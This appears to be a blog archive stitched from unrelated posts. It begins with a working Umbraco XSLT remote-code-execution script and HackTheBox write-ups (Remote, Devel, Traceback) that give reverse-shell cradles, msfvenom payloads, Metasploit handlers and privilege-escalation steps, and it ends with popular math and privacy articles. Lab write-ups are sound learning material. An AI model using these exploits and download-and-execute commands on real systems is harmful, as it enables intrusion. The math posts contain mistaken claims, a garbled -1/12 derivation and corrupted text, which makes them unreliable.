parser.add_argument('-u', '--user', metavar='USER', type=str,
    required=True, dest='user', help='username / email')
parser.add_argument('-p', '--password', metavar='PASS', type=str,
    required=True, dest='password', help='password')
parser.add_argument('-i', '--host', metavar='URL', type=str, required=True,
    dest='url', help='root URL')
parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True,
    dest='command', help='command')
parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False,
    dest='arguments', help='arguments', default='')
args = parser.parse_args()

# Payload
payload = """\
<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\
""" % (args.arguments, args.command)

login = args.user
password = args.password
host = args.url

# Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = { "username": login, "password": password}
s = requests.session()
r2 = s.post(url_login,json=loginfo)

# Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)

soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
    "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "",
    "ctl00$body$visualizeDo": "Visualize+XSLT" }

# Launch the attack
r4 = s.post(url_xslt, data=data, headers=headers)
# Filter output
soup = BeautifulSoup(r4.text, 'html.parser')
CMDOUTPUT = soup.find(id="result").getText()
print(CMDOUTPUT)

Next you'll need to run a local http server. I recommend python. This is what I used.

python SimpleHTTPServer 80

You'll also need to put the mini-reverse.ps1 in the root of that web server. So if you were type type into your browser: http://remote.htb/mini-reverse.ps1, it would download it.

You can download mini-reverse.ps1 from Github. You will also need to modify it with your computer's IP and port. Since we are using 4444 in my example, you should use that.

The first line of my mini-reverse.ps1 script looks like this:

$socket = new-object System.Net.Sockets.TcpClient('10.10.14.26', 4444);

Now we need to get metasploit running to catch the reverse shell.

metasploit
use exploit/multi/handler
set payload payload/windows/x64/shell_reverse.tcp
set LHOST 10.10.14.26
set ExitOnSession false
exploit -j

Make sure you change your LHOST to be your computer's IP.

Okay, now we are ready to run the exploit script. Make sure it is executable and then:

python exploit.py -u admin@htb.local -p baconandcheese -i 'http://remote.htb' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.26/mini-reverse.ps1')"

Again, remember to change the IP to be the same as your computer's IP. If you check your web server running on your computer, you should see the mini-reverse.ps1 download.

You should also see a new session in Metasploit.

In order to interact with this session, you'll need to type:

sessions -i 1

Where the session ID is the session that was created. You can check to see what sessions you have by typing:

sessions

You should now be in a really bad shell. Still, you can go grab the user flag. For me, I just did this:

type c:\users\public\user.txt

Got the user flag:

4ba34f5c3ef7bb216d152e7d06a1e676

Getting the root flag was really hard for me. It took me a few days and some help from the HackTheBox discord forums.

Getting root

If you made it to this point, you already have a not very interactive shell and the user flag. The session for that shell should still be running in metasploit.

Using the shell you got earlier, you can gain root by exploiting USOSVC which is a service running on the box. This is the Update Orschestrator service. We can modify it to run our own executable and then stop and start the service. The service runs as root so we can leverage that to gain control of the box. This is how I did it.

First I fired up msfvenom and gave it this command:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.26 LPORT=4444 -f exe --platform windows > reverse.exe

Put that reverse.exe into the directory that your web server from earlier is running. Remember, we still have a session going with a shell. Go over to that shell and create a temp folder. Then download the reverse.exe on to the box.

cd c:\
md c:\temp
cd c:\temp
powershell.exe -c wget "http://10.10.14.26/reverse.exe" -outfile "c:\temp\reverse.exe"

You should now have the reverse.exe file on the box we want to compromise. Now comes the best part.

sc config usosvc binpath="c:\temp\reverse.exe"
sc stop usosvc
sc start usosvc

If you go check metasploit you should have a new session. If you drop into that session using the:

sessions -i #

Where # is the number of the session that was just created, you should now have root on the box. Plus you have a way better command prompt. If you ever need to get back into metasploit from a shell, just hit control-z and it will let you back into the console.

Got the root flag. Finally!

7bef7fab554db7714e25fec6499dc8e9

This box was very difficult. The user flag was about my level, but the root flag was way hard for me.

I've been doing some ethical hacking lately. This is my first writeup for one of the computers I hacked into (legally.) The machine I compromised is called Devel on Hackthebox.eu. I'm a beginner when it comes to ethical hacking, so please excuse my mistakes.

Overall this box was fun. It allowed me to get more experience using metasploit which is really powerful. I'm totally a script kiddy with this tool.

Nmap scan

Let's get started with an nmap scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 11:26 CDT
Nmap scan report for devel.htb (10.10.10.5)
Host is up (0.074s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.29 seconds

The scan shows that we've got an FTP server and a Web server running on a Windows box. Let's see what the website shows:

Looks like we've got IIS version 7 with the default page. Let's see if we can login to the FTP server with anonymous.

Anonymous login worked just fine. Looks like there are some files in there including what seems to be the IIS start page. Could this be the web directory?

Let's see if we can upload a file to that directory:

Yes! Okay, now let's use msfvenom to create a page that we can exploit to get a reverse shell. I googled this to find the details.

The first link gave me what I needed. Make sure to replace LHOST with the IP of your machine.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.26 LPORT=1234 -f aspx -o shell.aspx

Now we've got a script to upload via ftp to the website. This should give us a reverse shell. First let's fire up metasploit so that we can capture the reverse shell.

You'll want to use the following:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.26
set LPORT 1234
exploit

Make sure to change the LHOST to point to your machine on the VPN.

That should get you a shell on the box.

Running getuid shows that we are IIS APPOOL\Web user. We want root so there is more work to do.

Let's go into the shell and use systeminfo to see if we can find some exploits.

Now we need to exit the shell, background the meterpreter session and do some exploit research.

exit
background
use post/multi/recon/local_exploit_suggester
set session 1
run

If you did that correctly you should see a list of expoits we can use. I had to google to see which one of these would be best. The recommendation was to use the kitrap0d, the second on the list.

use exploit/windows/local/ms10_015_kitrap0d
show options

We need to tell the module which session to run on, our local host ip and our local host port.

set sessions 1
set LHOST 10.10.14.26
set LPORT 1234
run

I goofed at first and left out the session. I added it and the exploit worked.

If you did everything correctly you should be back at a meterpreter prompt. If you run whoami you should see:

Great, we own this box. Go grab the user.txt and root.txt.  I initially had some trouble remembering which windows commands to use. I eventually figured it out.

User flag is:

9ecdd6a3aedf24b41562fea70f4cb3e8

Root flag is:

e621a0b5041708797c4fc4728bc72b4b

This box was fairly easy. Metasploit makes it pretty easy to find exploits. Figuring out which module and options is the hardest part. Google is your friend here. There are a lot of walkthroughs on this box you can use for additional help too.

This box was a lot of fun. I'd recommend it to beginners like me.

This was a great box!

This article is my guide for hacking traceback, one of the retired machines at HackTheBox.eu. This is my first hacking guide, so hopefully i'm doing this correctly.

I enjoyed this box. It was right at my skill level and took me about two hours to complete.

For ethical hacking, I'm using Parrot Security Linux running in a VM.

To start, instead of using the target box's IP address, I created an /etc/hosts entry for it called traceback.htb. This change makes things a lot easier because I don't need to remember the IP address of the box.

sudo echo "10.10.10.181 >> /etc/hosts

Nmap initial scan

nmap -A traceback.htb


Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 14:43 CDT
Nmap scan report for traceback.htb (10.10.10.181)
Host is up (0.061s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds

Pretty simple scan. It looks like web and ssh are available.

Web site looks like this:

Viewing source on the website reveals this:

Hmm...

I decided to search google for that string:

It looks like we got a hit. I'm going to see if any of those shells are installed on this server, time for gobuster.

I took that list of shells from GitHub and dumped them into a text file called shells.txt. Let's see if we can find them on the server:

Now let's fire up gobuster:

We got a hit!

I loaded the page into the browser:

http://traceback.htb/smevk.php

And this came up:

Looking at the source code of the original on GitHub, I can see a default login embedded in code.

Username: admin
Password: admin

Let's try those.

...we are in. It looks like the current user is webadmin. After browsing around in the webadmin folder, I noticed that the /home/webadmin/.ssh folder is writable. We can upload an authorized_keys file with our key in it to gain access via ssh. Gaining ssh will be very helpful.

First, let's generate an ssh key:

ssh-keygen

Now let's copy the public key to authorized_keys:

cp traceback.pub authorized_keys

Now let's upload it via the form on the website:

Great, it took it. Now let's chmod the private key so we can use it.

chmod 600 traceback

Now let's ssh into the box:

ssh -I traceback webadmin@traceback.htb

We are in!

Let's see if there are any programs we can run as root:

sudo -l

Oh, this looks promising. I google luvit and found this:

Luvit looks like a Lua application. I went to gtfobins to see if I could exploit a Lua application.

And here is our strategy. First, I executed:

sudo -u sysadmin /home/sysadmin/luvit

The application prompted me to enter something. I typed in the command I got from gtfobins but used bash instead of sh:

os.execute("/bin/bash -i")

Now I've got access to sysadmin and the first flag!

11dadca21fe54bc8d753f61fc7a47ada

Now let's see if we can get root.

I downloaded linpeas.sh from here.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

I tried to get it directly on the box, but that didn't work.

I'm going to download it to my local box and use python's built-in http server to upload it. I'm executing this in the same folder that linpeas.sh is in.

python -m SimpleHTTPServer

Now I can access it from the remote by calling:

wget http://10.10.14.26:8000/linpeas.sh

Let's make it executable:

chmod +x linpeas.sh

Now let's run linpeas.sh

./linpeas.sh

Scrolling through the output, I noticed this:

00-header seems to be the header message when you log in:

I decided to see if I could run "id" from that shell when I log in as webadmin. The command would tell me what priv's are being executed when that script is run.

echo "id" >> /etc/update-motd.d/00-header

When I log in, it should print out what user is executing that file. Hopefully root.

Boom root! Ok, let's exploit that. We know that the root flag is always /root/root.txt.

echo "cat /root/root.txt" >> /etc/update-motd.d/00-header

Now let's log in again.

And you can see the root flag printed:

b2a2c50f8f2c0d1acb6c0aaf090712c9

We are all done! We could've easily used that exploit to gain actual root on the box, but all I needed for this activity was the root flag. This box was fun! I highly recommend it.

I took this photo from my balcony. I used my iPhone XS (which takes pretty great photos.)

Medium recently shut down their third-party API without any notice. I was immediately incensed and decided to migrate my blog away from Medium. You can read more angst on this post and followup discussion on HackerNews about why I left.

This article will show you how to migrate your content on Medium to Wordpress. In my case, I'm hosting at Wordpress.com, but you can use these same steps to migrate to any hosted wordpress installation.

The first step is to get your content out of Medium. You can do this from the settings page under your account.

Once you've notified Medium that you want a copy of your content, you'll need to wait for the email. Once you recieve the email, you can go ahead and download the zip file.

Now that you've got the zip file its time to head over to Wordpress.com. If you don't already have a Wordpress account, go ahead and set one up. Wordpress has a built in feature allowing you to import directly from Medium. We will use this feature as an interim step in getting our content to our Wordpress installation. You can read more about this feature on Wordpress's website.

Now select the zip file you downloaded from the previous step and drag it over to the upload area on the page. Click "start import" and you should see this:

When you are all done, you should have all of your Medium content inside your Wordpress.com blog. Now if you want to move it to another blog (not hosted on Wordpress.com) you can simply export it in the standard Wordpress format and then import it on any hosted Wordpress blog.

I followed these steps on my own blog and everything moved over perfectly. If you are using a version of Wordpress > 5.0, you'll get prompts to convert your content into "blocks" when you first go to edit posts. Other than that, I found no issues migrating my blog away from Medium and on to Wordpress.

What if I told you the universe is destined to repeat itself—and that includes you? Before you dismiss me as having spent too much time staring at the night sky, let me introduce you to one of the most mind-bending theorems in mathematics: the Poincaré recurrence theorem. It's a legitimate mathematical proof that suggests, given enough time, everything will happen again. Yes, everything.

Meet the Mathematical Genius Behind the Theorem

Henri Poincaré wasn't your average mathematician—he was described as the last "universalist," meaning he made groundbreaking contributions to every single field of mathematics known during his lifetime. At age 13, his teacher prophetically told his mother: "Henri will become a mathematician… I would say a great mathematician." Another teacher simply called him a "monster of mathematics."

Here's a fun fact: Poincaré had terrible eyesight and couldn't see the blackboard during lectures. His solution? He sat in the back and memorized everything by ear, following along perfectly without taking notes. He would solve entire problems completely in his head before committing anything to paper.

In 1890, while working on the famous three-body problem (how three celestial objects move under mutual gravity), Poincaré stumbled upon something profound: in any bounded system with finite energy, the system will eventually return arbitrarily close to its initial state.

The Shoebox Thought Experiment

Imagine you have a sealed shoebox filled with gas molecules bouncing around. The Poincaré recurrence theorem tells us that if we wait long enough, those molecules will eventually return to almost exactly the same configuration they started in. Every. Single. Molecule. Back where it began.

This isn't magic or mysticism—it's pure mathematics. Because the box is finite and the total energy is conserved, there are only so many possible arrangements the molecules can take. Given infinite time, the system must cycle back through all configurations, including the original one. The probability isn't just high; it's mathematically certain.

Scaling Up to the Universe

Here's where things get deliciously weird. If we assume the observable universe is a finite, closed system (a big "if" that we'll address), then the same logic applies. Physicist Don Page calculated the Poincaré recurrence time for a hypothetical box containing a black hole with the mass of the observable universe.

The result? Approximately:

$$10^{10^{10^{10^{2.08}}}}$$ Planck times

But wait—there's more! Page later calculated the recurrence time for a Linde-type super-inflationary universe, arriving at:

$$10^{10^{10^{10^{10^{1.1}}}}}$$ years

Page claimed this is "the longest finite length of time ever explicitly calculated by any physicist." To give you some perspective: the age of the universe is about 13.8 billion years, or roughly \(10^{10}\) years. This recurrence time has five levels of exponentiation. It's so incomprehensibly vast that whether you measure it in Planck times, years, or millennia makes essentially no difference.

The Party Pooper: Heat Death

Unfortunately, there's a cosmic buzzkill. The universe will experience "heat death" in roughly \(10^{100}\) years—when all stars burn out, black holes evaporate, and everything reaches maximum entropy. That's incomprehensibly far in the future, but it's still a rounding error compared to Poincaré recurrence time.

Also, modern cosmology suggests the universe may not be the bounded, finite system the theorem requires. If the universe is infinite or continuously expanding (which current evidence supports), the recurrence theorem may not apply at all.

So... Will You Be Reincarnated?

The honest answer: probably not through this mechanism. The conditions for Poincaré recurrence likely don't hold for our actual universe. But here's what's genuinely remarkable: if those conditions were met, your reincarnation wouldn't be a matter of faith or hope—it would be mathematical certainty. The same atoms, in the same configurations, having the same thoughts, reading this same article. An infinite number of times.

Even if it doesn't literally apply to our cosmos, the Poincaré recurrence theorem remains one of the most beautiful demonstrations of how mathematics can take a simple premise and derive conclusions that boggle the mind. It's proof that the universe—or at least the mathematics that describes it—is far stranger than we might expect.

And hey, if nothing else, it gives "I'll do it eventually" a whole new meaning.

Sources

• MacTutor History of Mathematics: Henri Poincaré Biography

• Britannica: Henri Poincaré - French Mathematician & Physicist

• Wikipedia: Poincaré Recurrence Theorem

• Googology Wiki: Poincaré Recurrence Time

• Wikipedia: Heat Death of the Universe

In the early days of coal mining, workers faced an invisible killer: toxic gases like carbon monoxide and methane that could accumulate without warning. Their solution was elegantly simple—bring a canary into the mine. These small birds, more sensitive to poison than humans, would stop singing or collapse before gas levels became lethal, giving miners a crucial early warning to evacuate.

Today, a different kind of canary protects us from a different kind of threat. In the digital age, warrant canaries serve as an early warning system against secret government surveillance—and they exploit a clever legal loophole that turns silence into speech.

The Problem: National Security Letters

One of the tools used by the FBI to investigate national security threats is called a National Security Letter (NSL). These letters, which originated in the 1986 Electronic Communications Privacy Act and were expanded by the USA PATRIOT Act in 2001, allow the government to secretly demand user data from companies—emails, phone records, browsing history—without a traditional warrant.^[1]

Here's the catch: NSLs typically come with a gag order that makes it illegal for companies to tell anyone they received one. Not their users. Not their lawyers. Not the press. The company is legally compelled to hand over data and stay silent about it.

A federal court has ruled that the combination of NSLs and indefinite gag orders is unconstitutional, though legal battles continue. In 2014, the Inspector General investigated the FBI's use of NSLs and found instances of misuse, recommending better oversight.

So how do you warn users that their data has been compromised when you're legally forbidden from speaking?

You stop saying you haven't been compromised.

How Warrant Canaries Work

The idea was first proposed by Steven Schear on the cypherpunks mailing list in the early 2000s, and one of the earliest real-world examples appeared in a Vermont library in 2005. The sign simply read: "The FBI has not been here." If the sign came down, patrons would know the FBI had been there.^[2]

A modern warrant canary is a public statement—usually on a company's website or in a transparency report—that declares:

1. We have not received a National Security Letter or secret court order as of [specific date]
2. This statement will be updated on a predictable schedule (e.g., quarterly)

The logic is beautifully simple: while the government can compel you to stay silent, they cannot (in theory) compel you to lie. If a company receives an NSL, they simply stop updating the canary. The absence of the statement speaks volumes.

As EFF attorney Nate Cardozo put it: "There's no precedent that could compel Apple to lie."^[3]

Apple and the Corporate Canary

In November 2013, Apple became the first major tech company to implement a warrant canary in their transparency report. They stated:

Apple has never received an order under Section 215 of the USA Patriot Act. We would expect to challenge such an order if served on us.

The EFF praised Apple for "getting warrant canaries right."^[4] But here's where it gets interesting: by September 2014, that statement had quietly disappeared from Apple's transparency reports. Apple never confirmed receiving an NSL—they legally couldn't—but the missing canary told its own story.

This is exactly how warrant canaries are supposed to work. The silence is the message.

When Canaries Die: Real-World Examples

Reddit (2016)

In March 2016, Reddit removed their warrant canary from their annual transparency report. When asked about it, Reddit's general counsel gave a telling non-answer: "I've been advised not to say anything one way or the other." The canary had done its job.

Riseup.net (2016)

The encrypted email service Riseup.net failed to update their warrant canary on schedule. Their official Twitter went quiet. The community assumed the worst—and they were right. Riseup later confirmed they had received two FBI warrants with gag orders, though they emphasized they had not been compromised by an NSL specifically.^[5]

Ethereum Foundation (2024)

In February 2024, the Ethereum Foundation removed their warrant canary, with the commit message citing a "voluntary enquiry from a state authority that included a requirement for confidentiality."^[6] The canary concept continues to prove its value.

The TrueCrypt Mystery: A Canary in Disguise?

One of the most intriguing potential warrant canaries in history involves TrueCrypt, the popular open-source encryption software that had been downloaded over 30 million times.

In May 2014, the TrueCrypt website suddenly displayed this warning:

WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues

The anonymous developers recommended users switch to Microsoft BitLocker—a bizarre suggestion, since TrueCrypt users specifically didn't trust Microsoft. The project was dead, effective immediately.

Many speculated this was a warrant canary in action. The theory: the developers received an NSL demanding they insert a backdoor, and rather than comply, they killed the project entirely—warning users without violating their gag order.

Some even noticed a possible hidden message:

"Using TrueCrypt is Not Secure As it may contain unfixed security issues"

The first letters spell NSA. Coincidence? Maybe.

Plot twist: A comprehensive security audit completed in April 2015 found no evidence of deliberate backdoors in TrueCrypt.^[7] The developers' motivations remain a mystery. But the incident perfectly illustrates the paranoid, high-stakes world that warrant canaries inhabit—where silence speaks, and even a software project's sudden death can be a message.

Do Warrant Canaries Actually Work?

The legal status of warrant canaries remains untested in court. The theory is sound—the government can compel silence but not lies—but no case has definitively established whether removing a canary violates a gag order.

In 2015, a coalition including the EFF, Freedom of the Press Foundation, and NYU Law created Canary Watch to track warrant canaries across the internet. By 2016, they shut it down, declaring the project had "achieved its goals" of raising awareness about unconstitutional surveillance.^[8]

Whether or not warrant canaries hold up legally, they've already succeeded in one crucial way: they've made secret surveillance visible. Every dead canary is a reminder that the government is watching—and that companies are fighting back the only way they can.

Sources

[1] EFF: National Security Letters

[2] Cloudflare: What is a Warrant Canary?

[3] EFF: Warrant Canary FAQ

[4] EFF: Apple's First Transparency Report Gets Warrant Canaries Right

[5] Riseup: Canary Statement

[6] Wikipedia: Warrant Canary

[7] The Hacker News: TrueCrypt Security Audit Concludes No NSA Backdoor

[8] Canary Watch FAQ

Medium is a great story telling platform but it falls short for publishing any serious science and math related articles. The big issue with this type of content on Medium is that it relies on math which can’t be easily rendered on Medium. Most writing platforms struggle with math because the formulas use precision formatting that can’t be done in a simple editor. The solution to this problem is a system called Latex.

Latex is document preparation system designed to support precision typesetting. It is most often used for medium-to-large scientific documents but it does support pretty much any form of publishing. In laymen’s terms, Latex is a simple scripting language that you can run through a Latex parser to generate great looking high quality typesetting. If for example you want to create a nice looking mathematical formula like this:

You would simply send the following text into a latex parser:

f_m(n) > 2uparrow^{m-1}n

The parser would output the nicely formatted formula and you would be good to go.

$$f_m(n) > 2 \uparrow^{m-1}n$$

The nice thing about using Latex is that the syntax is standardized across many platforms. It is also very popular among the science and math communities. If you publish anything scientific or mathematical you probably already use Latex. Even Wikipedia uses Latex to format formulas for its pages.

Adding Latex support to Medium should be trivial. Obviously there would be some work involved but it wouldn’t take up too many resources. There are popular open source projects that make it very easy to add support to an existing website. One of those examples is MathJax.

MathJax is a high quality javascript project that supports several different typesetting languages (including Latex) and outputs HTML+CSS, SVG and MathML. It runs on all browsers and the resulting output looks great because it scales to fit the surrounding text. It also takes advantage of web fonts to create very clean and crisp text similar to what you already see on Medium.

You can see some examples of Latex on my math blog. Here is an example of an article I wrote on Graham’s number which is famous for being one of the biggest numbers ever used in a proof. But I digress.

Medium delivers content to a lot of people so it needs to be fast and scalable. MathJax fits this requirement because it too is scalable. It runs client side in the browser so it won’t consume expensive cloud CPU cycles. It also doesn’t need to be delivered to the browser on every page load. Once a user has it, it can be reused until Medium decides to update it.

MathJax is supported by many scientific organizations including IEEE, American Mathematical Society, APS Physics, Mathematical Association of America, American Institute of Physics, Oxford University Press, and the list goes on. The project is here to stay and will likely continue to be supported way into the future.

I’d like to see Medium take math seriously and make it look as good as the rest of their content. The Medium platform adds a lot of value for publishers including those who want to write scientific and mathematical articles. I’d love to see Latex support adopted in a future version.

The infinite monkey theorem is a bar in Austin, TX, but it is also a very cool mathematical theorem that deals with very big numbers. This article is about the theorem which has become very popular in recent times. The theorem as I understand it is as follows:

A monkey hitting keys at random on a typewriter style keyboard for an infinite amount of time will almost surely type the complete works of William Shakespeare.

There are many variants of this theorem which can include pretty much any target text from a single sentence to an entire library. The reasoning behind this supposition is that given infinite time, random input should be able to produce all possible output.

The infinite monkey theorem is important and has been used in software development and testing, commodity computing, project management and SETI to support a greater allocation of resources. The theorem is also used to illustrate basic concepts in probability ^[1].

The theorem also finds itself in popular culture including the TV cartoon the Simpsons. In one [episode](Last Exit to Springfield) there is a scene where Mr. Burns brings Homer to his mansion. One of his rooms has a thousand monkeys typing on typewriters. One of the monkeys writes a slightly incorrect line from Charles Dickens: "It was the best of times, it was the blurst of times."^[2]

In 2011 programmer Jesse Anderson decided to try to recreate this experiment using virtual monkeys that output gibberish. The algorithm would mimic monkey's banging on a keyboard. He wrote a computer program to see if the monkey's gibberish could match every work of Shakespeare. If there is a match from the gibberish to any portion of Shakespeare then the program will mark it matched and continue on. This isn't replicating the theorem exactly, but it is an interesting variation on it.

Jesse's program ran in the cloud on Amazon EC2 instances so he could create computational scale. He was able to start the project and match all 38 works of Shakespeare in 1.5 months. Over the course of the project, 7.5 trillion character groups were generated and checked out of 5.5 trillion possible combinations. ^[2:1] There are some other interesting statistics to come out of this project:

• monkeys ran 180,000,000,000 character groups per day.
• average iteration lasted 30 minutes and ran 5,000,000,000 character groups.
• monkeys found 1,982,507 distinct character groups and those character groups were found 3,788,175 times for a ratio of 1.8718555.

Proof

The proof of the infinite monkey theorem is pretty straight forward. If two events are statistically independent, then the probability of both of them happening equals the product of each one happening independently.

So if we wanted to show the probability of the monkey's typing the word "banana" it would be the probability of typing the letter b which is \(\frac{1}{50}\) multiplied by the probability of typing an a which is \(\frac{1}{50}\) and...

$$ \frac{1}{50} \times
\frac{1}{50} \times
\frac{1}{50} \times
\frac{1}{50} \times
\frac{1}{50} \times
\frac{1}{50} = (\frac{1}{50})^6 = \frac{1}{15,625,000 ,000}
$$

One in 15 billion sounds like a big number but it isn't zero so given an infinite amount of time you can be sure that you can eventually hit it. The formula for hitting any specific character sequence on a keyboard is:

$$
X_n = \big(\frac{1}{50} \big)^n
$$

As \(n\) grows, \(X_n\) grows smaller. For an \(n\) of a million, \(X_n\) is roughly 0.9999, but for an \(n\) of 10 billion, \(X_n\) is roughly 0.53. As \(n\) approaches infinity, \(X_n\) approaches zero. That is, by making \(n\) large enough, \(X_n\) can be made as small as you desire and the chances of hitting your phrase approaches 100%.

Probabilities

Ignoring punctuation, spacing and capitalization, a monkey typing letters uniformly at random has a chance of one in 26 of typing the first letter in Hamlet. It has a chance of one in \(676\) \( (26 \times 26) \) of typing the first two letters. Because the probability shrinks exponentially, at 20 letters it already has a chance of one in \(26^{20} = 19,928,148,895,209,409,152,340,197,376 \). In the case of the entire text of Hamlet, the probabilities are vanishingly small.^[3] Thus there is a probability of one in \( 3.4 \times 10^{183,946}\) to get the text right on the first try. The math for that probability is based on 130,000 characters in Hamlet. There are \(n=26\) characters on a keyboard. Using our formula from earlier we have \(26^{130,000}\). If we take the logarithm of each side we end up with:

$$
log_{10}(n) = 130000 \times log_{10}(26) = 183946.5352
$$

Therefore \(n = 10^{0.5352} \times 10^{183,946} = 3.429 \times 10^{183,946}\).

To get an idea of the magnitude of this probability, lets assume that we have a monkey on every atom in the known Universe. Those monkeys will type away on their keyboards from the big bang until the known end of the Universe.

There are \(10^{80}\) protons in the observable Universe. Assume the monkeys work for \(10^{38}\) years. Assuming the monkeys work non-stop at \(400\) words per minute, that's about \(2000\) characters per minute. There are \(500,000\) minutes in a year which means each monkey types half a billion characters per year. This gives the totafWhat il letters typed:

$$
10^{80} \times 10^{38} \times 10^9 = 10^{127}
$$

Even with that many monkeys over that very large period of time, they wouldn't likely type Hamlet. No, they will need a far greater amount of time. They will need more than \(360,000\) orders of magnitude more just to have a \(1\) in \(10^{500}\) chance. Or to put it another way, to have a one in a trillion chance to type out Hamlet we would need another \(10^{360,641}\) Universes full of monkeys. \(10^{127}\) might as well be zero compared to \(10^{360,641}\).

One of the more interesting features of this theorem is the magnitude of infinity. We often talk about infinity but it is really hard to gauge how big it is. The infinite monkey theorem shows that even very tiny probabilities are no match for the awesome size and power of infinity.

This is a remarkable and hard to believe consequence in mathematics. If you were to sum the natural numbers all the way to infinity, you would get \(-\frac{1}{12}\).

$$ 1+2+3+4+5+6... = -\frac{1}{12} $$

This is just insane. It makes no sense that a series with an obviously increasing sum would end up being a small negative number.

If you were to take the \(nth\) partial sum of the sequence you would use this formula:

$$ \sum_{n}^{k=1} k=\frac{n(n+1)}{2}, $$

The \(nth\) partial sum increases without bound as \(n\) goes to infinity. This is because the sequence of partial sums fails to converge to a finite limit. The series does not have a limit^[1].

One can however manipulate the the value to yield a number of interesting results. Some of these have applications in fields such as complex analysis, quantum field theory and string theory.

Proof

I recommend watching the Numberphile video which shows the proof for this. I won't do it justice.

Here is my attempt at explaining it. We want to solve for this:

$$ S = 1 + 2 + 3 + 4 + 5 + 6 + 7 + 8 + ... = ? $$

We are going to do this by relating it to another alternating series:

$$ 1 - 2 + 3 - 4 + 5 - 6 + 7 - 8 + ... = $$

This one is easier to work with and there are tricks for getting values for this divergent series.

We can do this by subtracting:

$$ 4S_2 = 4 + 8 + 12 + 16 ...$$

We also know that this alternating series:

$$ -3S_2 = 1 - 2 + 3 - 4 + 5 - 6 + 7 - 8 + ... $$

takes on the form:

$$ \frac{1}{(1+x)^2} $$

Where \(x=1\). So we can rewrite it to look like this:

$$ -3S_2 = 1 - 2 + 3 - 4 + 5 - 6 + 7 - 8 + ... = \frac{1}{(1+1)^2} = \frac{1}{4} $$

Now if we divide both sides by -3 we get \(-\frac{1}{12}\).

The fact that a clearly growing series can somehow end up as a negative number is just beyond intuition. The explanation for this lack of logic is that we don't really fully understand infinity. We know that if we stop the series at any point and measure it, it will likely be a very big number, but what happens at infinity? We just don't know.

Another way to think about it is that when you include all of the terms, all the way out to infinity, the sum truly equals \(-\frac{1}{12}\).

Let's graph it

I plotted this sum on Wolfram Alpha to see what it looks like:

As you can see the sum clearly goes towards infinity. So how are we getting this \(-\frac{1}{12}\)? What if we look at the negative values of \(n\) too? (Click here to see it on Wolfram Alpha

Do you see that portion of the graph that dips below the line? As both sides of the series continue to infinity that small portion of the graph below the line remains small. If you use calculus to determine its size:

And there we go. The area under the curve is equal to \(-\frac{1}{12}\). That would help explain the result^[2] but it still doesn't make any sense.

In Physics

In string theory with the study of bosons scientists look to compute the energy levels of a string. Strings vibrate and create harmonics which can be measured using this divergent series:

If the fundamental oscillation frequency is \(\omega\) then the energy in an oscillator contributing to the \(nth\) harmonic is \(\frac{nh\omega}{1}\). So using the divergent series, the sum over all harmonics is:

$$-\frac{h\omega(D-2)}{24}$$

